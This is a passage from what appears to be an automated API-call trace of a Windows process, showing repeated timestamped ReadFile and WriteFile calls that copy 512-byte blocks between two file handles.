lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.368] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.371] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.390] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.396] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.411] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.413] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.413] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, 